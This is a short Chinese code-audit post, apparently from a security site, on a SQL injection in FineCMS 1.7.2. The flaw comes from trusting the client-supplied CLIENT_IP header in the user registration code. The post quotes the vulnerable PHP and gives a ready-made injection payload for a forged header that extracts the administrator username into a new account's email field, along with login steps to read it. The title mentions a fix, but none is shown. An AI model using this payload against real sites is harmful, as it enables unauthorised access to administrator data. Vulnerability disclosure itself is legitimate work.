代码审计：Finecms 1.7.2注射漏洞及修复 |

 

public static function get_user_ip() {

 

if(getenv(‘HTTP_CLIENT_IP’) && strcasecmp(getenv(‘HTTP_CLIENT_IP’), ‘unknown’)) {

 

$onlineip = getenv(‘HTTP_CLIENT_IP’);

 

} elseif(getenv(‘HTTP_X_FORWARDED_FOR’) && strcasecmp(getenv(‘HTTP_X_FORWARDED_FOR’), ‘unknown’)) {

 

$onlineip = getenv(‘HTTP_X_FORWARDED_FOR’);

 

} elseif(getenv(‘REMOTE_ADDR’) && strcasecmp(getenv(‘REMOTE_ADDR’), ‘unknown’)) {

 

$onlineip = getenv(‘REMOTE_ADDR’);

 

} elseif(isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], ‘unknown’)) {

 

$onlineip = $_SERVER[‘REMOTE_ADDR’];

 

}

 

return $onlineip;

 

}

www.2cto.com

/* 显然可以伪造一个client_ip进行注入 */RegsiterController.php 145行处

 

private function reg($data) {

 

if (empty($data)) return false;

 

$data[‘groupid’] = 1;

 

$data[‘regdate’] = time();

 

$data[‘regip’] = client::get_user_ip();//使用了get_user_ip的方法,漏洞就此产生.

 

$data[‘status’] = $this->memberconfig[‘status’] ? 0 : 1;

 

$data[‘modelid’] = (!isset($data[‘modelid’]) || empty($data[‘modelid’])) ? $this->memberconfig[‘modelid’] : $data[‘modelid’];

 

if (!isset($this->membermodel[$data[‘modelid’]])) $this->memberMsg(‘会员模型不存在，请联系管理员。’);

 

if ($this->memberconfig[‘uc_use’] == 1) {

 

if (uc_get_user($data[‘username’])) {

 

$this->memberMsg(‘该用户无需注册，请直接登录激活！’, url(‘member/login’), 1);

 

}

 

$uid = uc_user_register($data[‘username’], $data[‘password’], $data[’email’]);

 

if ($uid <= 0) {

 

if ($uid == -1) {

 

$this->memberMsg(‘用户名不合法’);

 

} elseif($uid == -2) {

 

$this->memberMsg(‘包含要允许注册的词语’);

 

} elseif($uid == -3) {

 

$this->memberMsg(‘用户名已经存在’);

 

} elseif($uid == -4) {

 

$this->memberMsg(‘Email 格式有误’);

 

} elseif($uid == -5) {

 

$this->memberMsg(‘Email 不允许注册’);

 

} elseif($uid == -6) {

 

$this->memberMsg(‘该 Email 已经被注册’);

 

} else {

 

$this->memberMsg(‘未定义’);

 

}

 

} else {

 

$username = $data[‘username’];

 

}

 

}

 

$data[‘password’] = md5($data[‘password’]);

 

$userid = $this->member->insert($data);

 

return $userid;

 

}Exp:

提交用户注册的时候,伪造一个client_ip,内容如下:

sb’,’1′,’6′),(‘hell’,’1b192f49ddec03d0c7e777d3e578cebf’,(select username from fn_user where userid=1),’1′,’11111′,’sbd’,’1′,’6′)#

成功之后,登陆用户:hell,密码:sbdan. 邮箱处就有管理员的user了

 

作者：desperado